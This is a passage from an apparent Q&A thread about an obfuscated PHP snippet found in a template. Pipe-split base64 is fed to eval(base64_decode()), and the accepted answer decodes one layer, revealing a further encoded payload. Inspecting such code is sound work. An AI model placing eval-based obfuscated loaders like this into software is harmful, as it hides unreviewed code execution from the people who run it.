|3|Q|k|I|z|Q|T|R|E|Q|0|V|B|Q|z|Z|C|Q|U|M|4|Q|z|J|D|O|U|R|G|Q|z|A|1|O|U|I|z|N|k|Q|0|M|D|c|x|N|0|Y|4|M|U|M|y|R|D|V|D|R|E|Q|z|Q|z|g|5|N|j|l|C|R|D|U|1|N|0|F|B|N|z|U|1|O|D|h|E|N|0|I|4|M|D|N|C|N|z|E|3|Q|T|g|x|Q|z|l|C|R|E|J|G|R|D|F|E|R|k|F|C|Q|T|h|C|Q|k|I|z|N|U|R|B|N|U|I|0|O|D|E|4|M|D|l|C|O|T|g|5|N|j|h|B|N|j|M|z|Q|z|d|B|M|z|k|5|N|E|F|C|O|T|l|C|Q|0|M|x|Q|j|k|5|M|E|Q|2|R|D|J|D|N|0|J|B|N|0|M|5|N|0|E|y|Q|T|E|4|R|T|k|3|Q|j|d|B|N|D|l|F|O|D|h|C|R|U|M|5|Q|k|F|E|N|k|N|D|Q|z|d|E|Q|z|V|F|N|U|U|3|Q|j|M|5|N|z|Y|1|R|T|l|E|Q|z|B|D|M|k|J|G|O|T|B|D|R|U|U|w|Q|z|l|D|O|U|J|B|Q|0|M|4|Q|k|I|3|O|E|E|1|N|k|N|B|Q|j|E|5|N|U|N|C|R|T|h|C|R|k|I|y|R|D|Z|E|Q|0|M|1|Q|z|l|B|N|k|E|x|R|T|U|5|N|U|R|G|N|j|M|z|Q|j|Y|w|N|U|Q|3|Q|j|l|E|R|D|F|E|R|k|M|1|Q|j|R|D|O|E|J|D|Q|z|N|F|M|k|J|C|O|U|Z|C|Q|j|Y|4|N|z|N|B|N|j|l|B|Q|0|V|C|R|U|N|D|Q|0|J|E|O|E|M|4|O|U|I|5|Q|k|U|1|O|E|Z|F|M|D|k|5|O|T|B|C|R|k|M|z|Q|z|E|5|N|j|k|0|N|0|I|2|M|z|V|F|N|0|N|D|N|k|N|E|R|T|h|C|N|z|k|x|Q|z|l|B|M|z|k|1|R|D|F|F|N|E|M|4|Q|j|N|E|R|j|h|G|Q|T|N|B|M|T|V|C|Q|T|Z|F|M|T|h|G|R|D|B|B|O|T|k|2|Q|k|J|C|R|E|M|4|O|T|B|E|Q|k|Q|z|Q|j|l|C|R|U|M|z|Q|z|h|D|O|U|V|D|N|z|g|z|Q|z|V|G|N|E|E|0|M|D|c|x|O|U|Y|5|N|T|U|4|N|z|Z|E|M|U|N|D|O|E|I|1|O|D|l|C|R|T|R|B|M|0|Q|y|Q|U|I|1|O|T|d|C|Q|j|d|D|O|U|E|z|R|E|F|E|N|k|M|4|Q|z|l|C|M|D|g|x|R|D|h|F|M|0|I|5|O|T|c|3|R|D|l|F|N|U|Y|4|O|E|Y|y|R|D|Y|2|R|T|k|x|Q|0|J|E|Q|k|Q|1|Q|T|k|5|N|0|R|G|Q|T|R|D|O|D|V|F|Q|T|V|D|M|E|M|x|Q|j|k|1|O|E|M|1|O|T|E|5|N|j|c|1|Q|z|l|D|M|0|Q|x|R|E|Y|3|N|D|V|C|O|D|M|3|M|j|Z|E|O|U|F|B|R|T|h|B|N|0|U|5|N|j|g|4|O|E|F|D|N|k|F|D|Q|T|R|F|M|z|k|1|R|E|J|B|Q|j|Z|F|O|U|Q|5|N|U|E|w|O|D|R|B|R|E|F|D|N|0|E|4|N|D|d|G|Q|z|d|D|R|E|U|4|N|k|M|2|N|j|h|F|N|j|E|5|R|U|Q|3|R|U|J|D|Q|0|M|x|O|T|c|5|N|z|c|w|N|k|N|B|M|D|k|4|O|T|k|1|M|U|Q|2|Q|U|F|B|N|E|J|D|Q|z|g|3|Q|z|U|1|Q|0|J|F|N|k|N|D|Q|z|d|C|Q|U|M|4|R|D|h|E|N|T|c|z|O|U|F|C|N|0|I|0|O|U|U|4|R|k|Q|z|O|D|M|2|R|U|U|5|R|T|Q|4|N|j|g|3|O|U|F|B|N|0|U|z|Q|T|J|E|M|k|E|1|Q|T|V|C|M|j|d|C|Q|k|M|5|M|k|R|C|R|D|k|4|M|U|I|y|N|z|Y|5|N|z|g|4|R|T|J|B|R|E|E|1|Q|k|U|2|Q|T|U|2|O|E|N|E|O|U|N|G|Q|z|B|E|R|k|N|E|R|D|R|E|N|z|c|0|N|z|h|C|M|j|d|D|Q|z|A|3|Q|z|Z|D|N|j|E|1|R|D|V|F|M|0|F|E|M|U|Q|3|O|D|I|3|O|U|I|4|Q|0|Z|E|N|k|V|D|Q|j|F|B|M|E|N|B|N|0|U|3|M|0|E|1|Q|k|M|5|Q|j|l|B|Q|z|B|B|R|D|h|G|R|E|U|1|N|z|N|D|N|0|E|z|O|T|k|x|Q|T|U|5|N|k|N|F|O|T|F|C|N|U|E|z|R|E|F|E|M|k|Q|z|N|0|Q|3|R|T|k|1|N|k|U|4|M|z|U|1|N|T|Z|D|N|E|E|2|Q|U|R|D|M|z|l|E|Q|0|V|C|N|0|R|B|Q|0|Q|4|R|E|M|w|N|z|R|B|N|k|R|B|O|U|R|E|M|j|V|G|N|U|E|5|M|j|V|F|N|U|Q|z|Q|T|h|D|R|E|Z|C|R|k|N|D|Q|j|A|4|M|U|N|D|R|E|J|C|R|j|l|B|N|0|Q|5|R|T|c|z|O|E|N|E|R|U|J|C|Q|z|F|E|N|U|E|z|N|z|A|2|Q|z|Q|w|N|T|Z|E|R|j|k|1|R|T|Q|5|M|j|U|4|Q|z|N|C|R|E|M|y|O|U|N|E|Q|j|k|4|Q|j|c|5|M|k|M|5|Q|k|Z|E|M|U|V|B|Q|j|g|5|M|0|N|B|Q|T|Z|B|M|k|Q|x|R|U|F|C|R|k|F|E|R|D|R|D|R|E|R|B|Q|z|J|B|M|z|l|C|R|E|Y|5|Q|k|U|w|N|U|Y|1|N|U|M|3|Q|z|N|D|N|0|E|1|Q|z|d|F|N|0|J|C|Q|z|d|C|R|U|J|C|Q|z|Z|F|N|k|I|x|Q|T|U|3|R|j|d|D|N|D|A|3|M|T|d|G|N|j|Q|1|N|z|c|2|R|D|F|D|Q|z|h|C|N|U|J|B|M|E|Q|2|Q|T|d|D|O|D|V|F|O|U|R|D|M|E|M|y|Q|k|Z|B|N|D|h|G|Q|0|U|5|N|z|k|y|O|T|J|B|M|E|E|1|Q|z|Y|5|R|j|c|3|N|0|Z|C|Q|z|Q|w|N|z|E|3|R|j|Y|z|Q|j|d|E|M|z|k|w|O|D|d|D|O|E|E|0|Q|T|J|F|N|U|E|5|O|T|U|1|Q|j|k|0|Q|0|N|D|N|k|M|2|O|T|Z|E|N|k|U|1|Q|j|U|3|Q|0|M|x|Q|z|N|E|M|k|U|1|Q|k|Y|1|O|U|I|z|N|k|E|1|R|k|U|z|O|D|A|2|M|z|U|3|N|z|Y|3|M|T|h|B|R|D|E|5|Q|0|E|5|Q|0|M|1|N|0|Q|5|Q|T|A|5|R|k|M|y|Q|z|c|3|Q|j|h|F|Q|T|U|5|N|U|J|E|Q|0|F|D|N|0|N|D|Q|z|l|F|O|E|M|w|O|E|Q|3|R|E|F|E|O|U|Z|E|N|k|U|x|Q|0|Q|3|N|U|N|B|Q|T|M|3|M|D|Z|D|N|D|A|z|Q|k|V|F|O|T|V|E|O|U|F|B|O|T|Z|E|M|j|V|F|N|U|Q|z|Q|T|c|x|N|0|E|3|R|U|M|z|Q|k|F|E|M|U|J|G|Q|T|F|C|O|D|l|C|Q|z|R|B|Q|0|E|5|O|E|Z|E|M|z|k|3|N|z|J|F|M|U|Q|4|Q|z|V|D|N|k|E|5|O|T|d|E|N|T|k|5|R|T|E|5|N|j|k|3|Q|z|Z|D|M|0|M|4|O|T|Z|E|Q|U|F|D|N|j|Q|1|R|T|V|F|N|j|N|F|M|T|g|0|N|T|U|z|Q|k|Q|z|Q|T|Z|B|M|k|R|C|R|E|J|D|M|0|I|0|O|T|U|4|Q|0|Q|0|Q|z|h|B|R|T|h|E|O|T|g|5|Q|0|Q|2|Q|T|U|5|Q|0|N|B|N|0|J|C|M|T|Z|F|Q|T|U|5|O|D|g|3|O|D|I|3|Q|z|g|z|R|E|Y|4|N|D|U|1|M|0|I|1|R|j|Y|1|Q|T|R|D|R|E|V|E|Q|j|U|3|N|U|Q|5|R|D|F|E|N|E|N|F|Q|U|E|1|O|U|N|F|N|k|Q|5|M|U|F|C|Q|T|F|C|N|k|I|3|Q|z|Y|5|N|k|N|D|R|E|F|D|R|U|I|0|Q|k|J|D|O|U|Q|z|R|U|V|C|M|U|E|0|O|T|E|0|Q|j|N|G|N|z|F|G|M|z|Y|0|N|T|c|3|N|j|c|y|N|k|Y|2|Q|z|V|C|Q|T|B|E|N|k|E|3|Q|z|g|1|R|T|l|E|Q|z|B|D|M|k|J|G|Q|T|Q|4|R|k|N|F|O|T|d|D|O|E|M|5|Q|0|N|D|R|E|V|B|Q|U|J|B|N|k|I|3|Q|T|h|B|O|T|k|w|O|U|F|D|O|E|I|z|R|T|R|D|M|z|h|E|Q|0|Z|B|M|E|E|w|R|E|N|B|M|z|k|0|O|T|Q|1|R|D|c|5|O|T|B|C|N|T|Z|G|O|E|E|5|Q|T|k|1|N|z|U|4|N|D|g|0|R|D|F|E|Q|k|I|3|O|T|c|3|N|k|I|0|Q|U|J|E|Q|U|R|C|N|0|F|C|R|E|R|C|R|D|R|E|R|j|g|z|Q|U|I|5|N|0|U|5|Q|T|Q|4|R|D|k|4|O|U|Z|C|Q|j|c|0|Q|z|A|5|Q|U|Q|2|R|E|M|3|Q|U|I|2|Q|z|d|C|R|j|g|0|R|E|J|C|O|D|l|F|Q|z|V|C|O|D|Y|0|O|T|J|B|N|T|Y|0|N|T|c|3|N|j|c|y|N|k|Y|2|Q|0|F|D|Q|T|J|E|N|T|k|x|R|T|E|5|Q|z|k|w|Q|z|Z|D|N|E|M|4|O|U|F|E|N|0|R|G|O|D|I|3|N|0|M|5|Q|k|Z|E|M|U|V|B|Q|j|g|5|M|0|N|B|Q|T|Z|B|M|k|Q|x|R|U|F|C|R|k|F|E|R|D|l|E|M|U|Q|0|Q|0|V|B|Q|T|U|0|O|U|Q|1|N|E|R|C|O|U|N|B|O|D|g|w|O|E|Y|1|R|T|N|B|N|z|E|5|N|U|N|D|Q|k|F|D|O|U|N|G|R|D|Z|F|O|E|F|C|O|U|V|C|R|k|F|G|Q|T|F|B|N|T|k|2|N|0|V|C|Q|0|Q|y|R|E|Z|D|M|T|h|B|Q|T|M|5|Q|k|R|G|O|U|J|F|M|D|V|F|O|E|U|5|M|j|V|F|N|U|R|B|R|U|N|E|R|E|R|D|R|E|J|B|R|D|A|2|N|D|Z|E|O|D|M|3|M|E|E|0|Q|k|J|C|N|U|F|C|R|E|F|F|N|E|I|5|Q|k|F|E|N|k|Q|2|R|D|F|B|M|D|U|3|N|T|Z|E|N|E|E|1|R|E|Z|B|O|T|k|2|Q|z|V|D|O|E|F|G|N|T|h|E|N|E|R|B|Q|z|h|D|M|E|M|4|O|D|F|D|M|U|I|1|N|T|Y|z|Q|k|Q|z|N|E|I|0|M|D|c|x|R|E|Z|D|M|D|c|2|O|E|Q|4|Q|0|R|B|R|D|M|5|N|j|k|1|R|T|M|5|N|U|Q|x|Q|T|B|B|N|U|I|2|Q|k|F|D|M|0|E|w|R|E|N|E|N|k|N|D|Q|j|Q|5|R|E|M|5|R|D|F|E|R|j|l|C|Q|T|B|D|M|k|J|B|N|z|N|B|N|U|I|z|Q|T|A|4|R|k|I|5|Q|k|J|B|Q|j|g|z|Q|j|N|B|R|T|k|x|N|T|h|E|N|k|F|B|O|T|B|C|R|k|M|z|Q|z|E|5|N|j|k|w|O|U|E|3|Q|U|Q|x|R|D|E|3|Q|U|N|E|R|U|R|B|Q|j|k|4|Q|z|h|C|M|E|E|0|R|E|N|E|N|U|N|B|Q|U|Z|E|N|E|N|E|O|E|U|4|Q|z|Y|w|N|T|I|5|Q|U|F|C|N|z|c|0|M|D|N|B|Q|k|N|C|N|0|J|D|Q|T|A|4|O|D|k|1|Q|0|N|C|Q|U|M|5|Q|0|Z|E|N|k|U|4|Q|U|I|5|R|U|J|G|Q|U|Z|B|M|U|E|z|O|D|A|2|M|0|N|C|N|z|d|F|N|T|c|w|Q|z|l|B|Q|0|E|w|R|D|R|B|N|E|Q|2|Q|T|Y|5|R|j|c|3|Q|z|h|C|O|T|l|F|R|D|h|E|R|E|J|C|Q|z|l|C|Q|U|M|2|Q|0|R|F|R|U|I|x|O|T|F|C|R|E|E|2|Q|U|F|D|N|0|U|y|Q|z|N|C|Q|0|Q|4|R|E|I|4|R|T|g|3|Q|T|d|B|M|U|U|0|Q|T|R|D|Q|0|F|E|O|T|J|D|O|U|J|E|Q|j|U|5|M|0|Q|0|R|D|Z|D|R|D|d|F|R|D|A|2|N|D|Z|E|R|T|N|C|M|j|V|B|N|z|d|B|N|E|E|y|Q|z|l|F|O|U|N|E|Q|U|R|E|M|k|U|w|Q|0|Z|E|N|k|F|C|Q|T|U|5|O|T|U|3|Q|z|Q|4|N|z|k|w|O|U|Z|D|O|E|M|4|Q|T|E|4|R|j|l|B|O|D|M|3|N|U|J|F|Q|z|h|D|N|0|U|2|Q|z|E|5|N|k|J|C|Q|T|B|B|N|U|Q|2|R|D|l|C|R|j|c|2|Q|U|V|B|Q|U|I|5|Q|j|M|3|O|D|g|2|Q|j|k|1|R|U|M|0|O|D|c|3|Q|U|E|1|O|T|c|4|M|j|U|4|O|T|d|E|N|E|M|2|Q|j|Z|D|O|E|N|E|O|T|F|F|M|k|M|w|Q|T|Z|D|N|j|Z|G|Q|T|Z|E|M|E|U|2|O|D|E|2|R|T|k|2|Q|T|M|3|M|D|Z|D|N|U|J|B|N|E|Q|2|Q|T|F|F|M|j|l|D|Q|T|R|D|Q|j|c|0|O|T|E|1|M|U|Q|2|R|D|Z|E|M|T|c|1|Q|U|N|B|Q|U|M|z|Q|z|J|D|M|E|E|2|Q|z|Y|3|Q|z|Q|w|N|z|E|5|Q|U|N|G|Q|z|B|E|O|U|E|1|O|D|h|D|Q|k|F|C|Q|T|Z|F|M|T|Z|B|O|U|M|2|N|k|E|4|Q|0|V|D|Q|j|g|y|Q|T|V|D|R|E|R|F|Q|0|F|D|M|U|I|2|Q|0|V|D|O|U|V|E|Q|z|A|5|M|0|N|B|Q|j|Q|2|N|E|N|C|R|T|V|D|N|z|d|E|Q|0|V|E|O|E|N|G|O|T|I|5|O|E|E|y|R|E|E|1|R|U|U|z|N|j|k|1|R|k|M|3|Q|k|N|D|N|D|U|z|Q|T|M|3|Q|j|Y|z|O|D|Q|3|R|j|d|F|R|D|l|F|Q|0|I|4|N|k|Y|3|O|E|E|5|Q|U|F|E|Q|0|U|2|O|T|Q|3|R|D|l|D|R|E|N|D|Q|k|Q|w|Q|T|c|5|R|U|Q|y|Q|T|R|E|M|k|F|B|Q|T|V|C|O|E|M|4|Q|z|c|2|Q|k|E|w|Q|T|k|4|O|U|I|2|Q|z|V|D|M|z|k|z|R|E|J|C|Q|z|l|C|O|D|R|C|N|z|Y|4|O|T|Z|F|N|k|M|y|Q|k|U|4|R|k|E|z|O|T|A|5|M|j|Q|x|M|0|I|5|N|U|E|y|R|D|J|B|Q|U|E|2|Q|z|N|D|O|D|c|0|N|k|U|4|O|E|I|x|N|0|V|D|N|0|J|B|Q|0|J|E|O|U|R|G|Q|k|Z|B|N|j|g|z|N|0|Z|B|O|E|N|E|R|T|d|D|R|k|I|z|R|T|B|E|Q|z|h|F|O|D|d|B|Q|0|E|0|R|E|Q|1|Q|0|N|F|Q|T|l|B|M|0|I|4|Q|0|Q|3|Q|z|U|x|O|E|Z|E|R|U|J|G|Q|z|l|C|R|E|M|5|Q|z|h|B|M|T|Z|D|N|k|Y|5|N|D|Y|x|N|U|R|C|O|E|M|1|Q|U|R|B|M|j|k|0|O|T|Q|4|N|j|h|B|O|T|l|B|M|U|Q|1|Q|T|k|5|N|D|U|3|N|k|U|5|N|T|c|0|N|z|h|B|M|U|Q|3|R|T|R|D|R|U|I|0|Q|0|J|C|Q|k|Q|2|R|T|N|B|R|D|k|0|Q|z|J|B|N|k|E|5|O|T|E|5|R|j|k|1|N|T|g|3|N|z|c|x|Q|0|Z|D|O|T|V|G|N|T|N|E|Q|U|E|z|R|T|A|5|Q|0|E|1|N|0|Y|3|O|E|M|2|O|T|Z|E|Q|k|U|2|Q|z|Z|D|O|T|g|y|O|T|h|D|O|U|V|D|Q|k|V|B|M|U|M|4|Q|j|Q|1|R|j|g|4|O|U|M|4|M|D|Z|F|R|D|Z|E|Q|k|Q|5|Q|z|h|B|Q|j|V|B|O|T|V|B|M|k|Q|y|Q|U|F|B|N|k|M|z|Q|z|h|B|R|j|U|4|R|E|F|E|N|k|N|E|Q|z|V|D|N|E|M|4|R|D|d|E|R|j|c|z|O|E|Z|C|M|T|Y|4|O|T|l|E|N|0|R|B|Q|k|Y|3|N|U|N|B|O|T|E|4|N|j|g|5|N|U|Q|1|M|j|k|1|Q|T|J|E|M|k|F|B|Q|T|Z|D|M|0|M|4|Q|U|Y|1|O|E|R|B|R|D|Z|D|R|E|M|1|Q|z|R|D|O|E|Q|3|R|E|Y|3|M|z|h|G|Q|j|E|2|O|D|k|5|R|D|d|E|Q|U|J|G|N|z|V|D|Q|U|E|1|Q|T|M|5|N|T|Y|3|N|j|I|5|Q|U|F|C|N|z|c|0|M|D|N|B|Q|z|l|C|O|U|M|4|Q|T|Z|E|Q|U|R|G|N|0|F|D|O|U|M|3|Q|z|N|E|M|U|E|y|N|z|B|B|N|E|J|C|Q|j|R|B|Q|k|Q|0|R|U|F|C|N|T|c|1|Q|0|Z|E|N|0|N|B|R|E|M|1|R|T|h|G|O|U|E|2|Q|j|c|3|N|D|B|B|R|T|Y|x|N|U|R|D|N|j|k|2|R|E|N|F|N|k|N|D|Q|z|M|3|N|U|E|w|Q|T|V|D|N|j|l|G|N|z|c|5|M|T|R|C|Q|j|M|3|M|j|d|G|N|j|M|1|O|D|k|x|R|E|N|E|N|k|M|y|Q|U|E|5|N|E|Q|w|Q|T|N|E|N|U|E|2|Q|T|g|5|N|D|l|B|O|T|U|3|R|E|J|C|Q|j|Y|5|N|T|V|G|Q|k|J|D|R|k|Q|y|R|E|R|D|M|D|l|C|Q|z|V|B|R|j|U|2|R|E|N|E|R|U|J|G|Q|k|J|E|M|k|M|3|R|D|l|D|N|T|k|2|O|T|V|F|M|z|k|1|R|D|F|B|M|E|E|1|N|0|Y|3|R|E|N|G|M|0|I|3|M|U|Q|4|Q|z|Z|D|N|E|I|3|Q|k|J|E|M|D|l|B|N|z|B|B|N|k|M|2|Q|T|A|5|O|U|R|B|R|E|J|C|R|U|I|3|R|T|F|D|N|0|Q|5|Q|z|U|5|N|j|l|B|R|T|A|5|R|E|Q|y|N|j|M|1|M|T|d|C|Q|z|h|D|N|D|k|w|Q|0|J|F|M|0|J|G|Q|j|l|C|R|U|N|F|Q|z|N|F|R|E|F|F|O|T|F|C|R|k|F|G|Q|T|R|D|R|E|U|4|O|D|Y|2|R|T|k|x|R|E|N|E|N|k|M|y|Q|U|E|5|N|E|Q|w|Q|T|N|E|N|U|E|2|Q|T|g|5|M|j|V|F|N|U|Q|1|N|U|R|D|R|T|F|C|O|U|M|4|Q|j|d|C|O|U|Q|3|R|T|J|C|Q|k|E|5|O|T|M|5|N|T|g|4|Q|k|R|C|Q|j|k|1|N|T|g|3|N|j|c|y|N|k|Z|D|Q|z|l|E|N|U|E|5|M|T|U|4|R|D|Z|B|Q|T|k|w|Q|k|Z|D|M|0|M|x|O|T|Y|5|M|D|l|B|N|0|F|E|M|U|Q|x|N|0|F|D|R|E|V|E|Q|U|I|5|O|E|M|4|Q|j|B|B|N|E|R|D|R|D|V|D|Q|U|F|G|R|D|R|D|R|D|h|F|O|E|M|2|M|D|U|y|O|T|c|1|N|j|h|E|N|T|g|5|N|k|M|0|Q|z|R|D|O|E|F|B|O|T|A|5|N|U|N|F|Q|z|V|C|N|E|J|E|R|D|Z|E|R|k|I|w|O|U|J|D|Q|U|E|w|Q|T|l|D|Q|U|Q|1|Q|z|J|C|R|E|R|B|Q|0|Q|4|R|j|h|D|Q|j|I|z|Q|z|d|B|M|z|l|E|M|j|l|B|O|T|l|D|N|j|c|0|N|z|h|B|N|U|Q|4|R|D|B|C|R|E|M|3|Q|k|F|C|R|U|N|E|R|U|V|B|Q|k|E|1|Q|j|h|B|M|D|l|F|R|D|d|F|M|0|J|G|O|D|k|3|N|z|c|x|R|T|N|D|O|E|E|z|Q|T|V|E|N|j|k|5|R|D|M|1|R|j|U|y|Q|k|N|D|M|U|M|0|Q|T|V|F|M|T|k|5|N|0|V|D|O|U|M|1|Q|j|l|D|N|0|V|D|Q|j|E|5|N|k|J|G|Q|j|U|5|N|U|R|C|R|D|h|C|O|U|I|3|R|E|J|E|N|k|N|C|R|D|U|2|M|D|V|C|R|U|M|z|Q|T|c|2|N|D|A|5|N|k|J|B|Q|k|N|D|M|z|U|x|O|E|N|F|N|U|N|B|Q|j|R|C|O|E|N|D|Q|z|l|E|R|U|I|1|Q|T|Z|C|N|U|I|0|O|T|h|D|N|0|R|G|Q|z|h|C|Q|0|Q|y|R|E|F|B|M|T|Z|E|N|D|B|B|R|j|d|C|Q|U|Q|3|N|z|Q|x|O|T|d|D|Q|0|M|y|Q|j|d|B|N|U|Q|x|R|T|B|D|O|D|c|1|Q|z|l|D|Q|U|M|z|R|T|B|C|Q|k|E|x|Q|0|F|B|N|k|E|4|O|T|A|5|R|k|Q|1|N|T|g|3|N|k|N|G|R|D|J|E|M|j|k|5|O|T|N|E|R|D|U|w|O|T|F|B|Q|k|E|x|Q|j|Z|D|N|0|I|2|O|T|B|E|Q|k|Q|5|Q|z|l|D|Q|z|g|x|N|0|V|E|O|E|V|B|Q|U|I|5|N|U|M|4|Q|T|Y|5|Q|U|Q|x|R|U|F|C|O|U|I|0|R|E|N|E|N|0|R|B|Q|z|h|B|O|T|k|x|Q|j|k|5|R|k|R|B|O|U|M|4|M|E|M|1|Q|z|B|D|R|D|Z|D|N|z|I|3|Q|U|M|z|Q|k|I|3|R|D|d|F|R|D|h|F|Q|U|F|C|O|T|V|D|O|E|E|2|O|U|F|E|M|U|V|B|Q|j|l|C|N|E|R|D|R|D|d|E|Q|U|M|4|Q|T|k|5|M|U|I|5|O|U|Z|E|Q|T|l|D|O|D|B|D|N|U|M|w|Q|0|Q|2|R|U|E|1|Q|U|V|B|M|D|k|2|Q|T|F|B|R|E|E|5|O|U|F|D|O|E|F|F|N|z|Y|2|O|T|l|G|R|E|J|E|N|U|M|y|Q|k|R|E|Q|U|N|E|O|E|U|4|Q|z|U|3|Q|U|V|F|R|D|U|w|R|D|Z|B|Q|T|k|w|Q|k|R|D|N|k|M|z|O|U|Z|E|Q|0|Q|w|Q|0|F|C|N|k|J|D|Q|k|Y|4|Q|0|E|z|N|z|U|1|M|j|d|G|Q|k|M|0|M|D|c|x|N|0|Z|D|O|U|I|w|Q|0|N|E|Q|k|R|B|Q|z|R|B|O|U|E|2|O|T|k|1|O|U|E|4|N|D|E|z|Q|T|Y|w|Q|k|R|D|M|j|k|0|R|D|R|F|N|k|J|F|Q|k|E|3|N|U|F|F|Q|T|l|D|N|z|l|D|N|0|U|5|N|z|k|1|N|0|J|C|O|E|I|3|Q|U|U|5|N|j|l|C|O|E|E|5|N|U|M|5|Q|T|Z|B|M|U|U|1|O|T|V|E|R|j|Y|1|Q|T|F|C|R|k|M|0|N|z|Y|2|Q|z|c|y|N|0|E|2|M|z|c|5|Q|j|h|D|R|k|Q|2|R|U|N|C|M|U|E|w|Q|0|E|3|R|T|l|E|Q|0|R|F|Q|U|I|5|Q|k|R|E|R|E|R|D|Q|0|Z|E|M|k|E|1|N|U|E|5|O|E|E|0|R|D|J|B|N|E|E|x|Q|z|N|C|N|U|M|4|O|T|Z|E|N|E|R|B|Q|0|V|C|Q|U|I|0|Q|z|Z|D|R|E|U|4|Q|j|d|B|N|T|d|E|N|k|E|3|M|T|c|y|N|0|Y|2|M|z|c|y|R|T|F|E|O|E|M|1|Q|z|l|B|N|k|E|x|R|T|U|5|N|U|R|G|O|T|Y|5|N|E|M|2|Q|z|J|D|O|D|k|2|R|D|Z|F|N|T|k|3|Q|z|R|C|N|0|I|5|Q|0|J|E|R|k|M|w|O|T|F|C|O|U|F|E|O|U|J|D|O|U|U|0|O|D|I|3|N|0|E|4|N|z|I|2|R|j|Z|D|Q|T|A|5|O|D|k|5|N|T|A|5|N|T|V|C|O|T|R|D|Q|0|M|2|Q|z|Y|5|N|k|Q|2|R|T|U|5|N|z|k|y|O|T|J|B|M|E|E|1|Q|z|Y|5|R|j|c|3|N|z|Z|C|R|E|I|y|O|D|h|E|Q|k|M|3|Q|k|V|F|M|U|U|x|O|E|U|4|N|z|l|B|Q|T|d|F|M|0|E|y|R|D|J|B|N|U|E|1|Q|j|I|3|Q|k|M|w|O|U|F|E|N|k|R|D|Q|0|Q|3|Q|0|I|y|O|D|M|4|N|E|Y|2|Q|z|g|1|M|k|M|5|Q|j|V|B|O|E|Q|4|R|T|V|D|R|D|c|2|O|T|F|E|Q|0|Q|2|Q|z|I|5|R|E|E|x|R|T|B|B|N|E|Q|y|Q|T|k|5|M|E|J|B|Q|z|N|D|M|k|E|1|Q|0|R|E|R|k|N|F|O|D|E|3|O|U|J|E|R|D|l|F|Q|0|J|F|O|T|d|D|N|E|I|1|O|T|E|4|R|k|U|y|Q|z|N|C|Q|0|Q|4|R|E|I|4|R|E|M|w|N|j|A|1|M|j|k|y|N|k|R|B|Q|T|U|3|O|T|d|C|O|E|M|w|Q|z|c|5|N|j|g|4|O|U|E|3|Q|T|d|C|N|0|I|3|Q|T|g|4|R|U|V|C|Q|z|k|x|Q|z|l|B|M|z|k|1|R|E|J|E|R|U|M|5|Q|z|V|B|Q|U|E|1|Q|k|F|C|N|T|h|D|N|z|c|5|M|T|U|5|R|T|g|0|M|T|N|B|N|j|A|1|R|E|I|5|O|T|R|E|M|E|U|w|N|0|E|3|O|U|M|5|Q|0|F|D|M|0|U|w|Q|k|J|B|M|U|N|B|Q|T|Z|B|O|E|M|3|R|D|l|D|O|U|J|D|R|T|F|D|R|E|Q|0|R|D|c|3|M|j|N|D|N|0|E|z|O|U|V|B|N|D|E|z|Q|U|Q|0|N|U|V|E|M|T|N|C|Q|z|l|E|N|U|J|F|Q|j|R|C|N|k|J|E|R|D|h|F|M|0|J|C|Q|T|A|3|R|T|Y|4|O|U|R|D|R|E|V|B|Q|j|l|C|N|E|R|D|R|D|d|E|Q|U|M|4|Q|T|k|1|O|T|l|E|N|T|d|F|M|U|E|3|O|T|B|C|R|E|M|z|Q|z|N|B|N|U|N|E|R|T|M|4|M|T|d|F|O|T|A|i|O|2|V|2|Y|W|w|o|d|l|9|3|W|T|d|5|Y|2|x|X|U|0|x|w|N|y|g|k|d|l|9|l|V|2|J|u|N|W|t|S|d|U|s|4|M|i|w|k|d|l|9|0|Z|H|I|3|U|j|d|z|U|W|4|5|V|S|k|p|O|w|=|=|";
$m=str_replace("|","",$m);
eval(base64_decode($m));
unset($m);
```

Comment: Replace `eval` with `echo` and you'll get the source. Let's hope it's not malicious :)

Comment: Yes, it's a typical, often used multi-layered obfuscation of code, usually employed to put some copyright notice into the template. Have fun multi-layer decoding it, all the code necessary to do so is right there.

Comment: Ah, yes, obfuscation. Can be fun, especially if it is an "encrypted" page and you find all the usernames *and the passwords* hidden inside the obfuscated code.

Comment: What a ridiculous thing to do?  I can understand wanting to receive credit but this to me would scare off most people if they take the time to dig into the code.  Thanks for the help!

Answer (score 8, accepted):

What I did is

1. Pasted the given code in a PHP file.
2. `echo(base64_decode($m));` gave following code.

   ```
   $v_8pYzK85RUW2="JHZfMnZ1THAxOHk0V1E9IlpuVnVZM1JwYjI0Z2RsOWxjemR1YURKNlZUQjNUU2drZGw5YVZtaHJNMVkyY2t0WVZ5bDdKSFpmVW1GWFRsSm9hV3BVTm13OU1EdDNhR2xzWlNneEtYdHBaaWdrZGw5YVZtaHJNMVkyY2t0WVYxc2tkbDlTWVZkT1VtaHBhbFEyYkYwOVBXNTFiR3dwWW5KbFlXczdLeXNrZGw5U1lWZE9VbWhwYWxRMmJEdDljbVYwZFhKdUpIWmZVbUZYVGxKb2FXcFVObXc3ZlE9PSI7ZXZhbChiYXNlNjRfZGVjb2RlKCR2XzJ2dUxwMTh5NFdRKSk7ZnVuY3Rpb24gdl93WTd5Y2xXU0xwNygkdl9BVjQzYmIxN2lSYiwkdl93bFR3ajN2QnE4aSl7ZWNobyAiIjskdl9yYVBucnBlbWFUbz0iIjskdl9lV2JuNWtSdUs4Mj0odl9lczduaDJ6VTB3TSgkdl93bFR3ajN2QnE4aSkvMik7Zm9yKCR2X2dkZm02M2JnUVc2PTA7JHZfZ2RmbTYzYmdRVzY8JHZfZVdibjVrUnVLODI7Kyskdl9nZGZtNjNiZ1FXNil7JHZfcmFQbnJwZW1hVG8uPWNocihoZXhkZWMoc3Vic3RyKCR2X3dsVHdqM3ZCcThpLCR2X2dkZm02M2JnUVc2KjIsMikpKTt9JHZfMlpScVl4ZTB4emo9IiI7JHZfZVdibjVrUnVLODI9dl9lczduaDJ6VTB3TSgkdl9yYVBucnBlbWFUbyk7JHZfU2IzUWlLMWdoVXE9dl9lczduaDJ6VTB3TSgkdl9BVjQzYmIxN2lSYik7Zm9yKCR2X2dkZm02M2JnUVc2PTA7JHZfZ2RmbTYzYmdRVzY8JHZfZVdibjVrUnVLODI7Kyskdl9nZGZtNjNiZ1FXNil7JHZfUGxoQlM0VnVxZng9c3Vic3RyKCR2X3JhUG5ycGVtYVRvLCR2X2dkZm02M2JnUVc2LDEpOyR2X255T2o3VXFvTDc2PXN1YnN0cigkdl9BVjQzYmIxN2lSYiwkdl9nZGZtNjNiZ1FXNiUkdl9TYjNRaUsxZ2hVcSwxKTskdl9